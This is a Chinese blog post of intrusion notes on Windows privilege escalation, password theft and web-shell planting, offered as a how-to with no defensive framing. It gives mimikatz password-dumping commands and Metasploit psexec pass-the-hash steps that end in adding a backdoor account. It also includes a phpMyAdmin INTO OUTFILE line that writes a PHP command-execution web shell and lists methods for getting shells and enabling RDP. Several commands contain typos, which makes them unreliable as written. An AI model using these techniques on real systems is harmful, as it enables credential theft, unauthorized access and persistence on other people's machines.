高级入侵

高级入侵

Windows权限分析与密码安全测试

1.windows xp写入管理员权限
2.windows 2003默认权限
—–默认只安装静态HTTP服务器
—–增强的文件访问控制
—–父目录被禁用
—–坚持最小特权原则

注意给users组只有读取和运行权限

直接在系统上面运行上面与webshell下运行木马区别
在系统上运行木马是系统权限运行,在webshell下运行木马是以当前内置中间件权限运行

中间件权限
1.菜刀进入右键
执行
whomai
得知自身权限
2.cd c:\www\
3.dir

本地管理员密码如何直接提取

1.直接通过mimikatz读取管理员密码(win7 winxp)
第一条 :privilege::debug //提升权限
第二条:sekurlsa::logonpa ssWords //抓取密码

2.webshell

3.Lazagne-master

4.利用hash远程登录系统主要通过msf的
exploit/windows/smb/psexec模块来完成

use exploit/windows/smb/psexec
show option
set RHOST 192.168.1.109
set SMBUser administrator
set SMPass (根目录下的pass.txt里的哈希值)
exploit
shell
net user
net user 123 123 / add


本地哈希破解
注意本地搜索sam 这个是目标机里的所有密码

5.通过LC5暴力破解hash密码
使用gmer直接提取sam和sysytem文件或用pwdump7提取HASH 最后使用LC5破解

6.使用Ophcrack(kali)破解系统hash密码

获取Webshell方法总结

主要通过谷歌搜索cms漏洞

phpcms discuz phpwind

非cms获取webshell方法

1.数据库备份获取
2.抓包上传获取
3.sql命令获取
4.模板修改获取
5.插入一句话获取
6.修改上传类型获取

其他方式

PHPmyadmin获取

select '<?php echo \'<pre>\';system($_GET[\'cmd\']);echo \'<pre>\';?>' into outfile 'E:/xamp/www/xioam.php'

php爆路径方法收集



tomcat获取
weblogic获取
jboss获取

内网远程连接

webshell如何开启3389

服务器端口被修改如何查找

cmd
tasklist /svc 寻找TermService

netstat -ano
查看所有端口

服务器处于内网如何连接


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 951207194@qq.com

文章标题:高级入侵

文章字数:506

本文作者:Mang0

发布时间:2018-04-23, 21:33:14

最后更新:2018-11-02, 21:52:18

原始链接:http://mang0.me/archis/1f382107/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录
×

喜欢就点赞,疼爱就打赏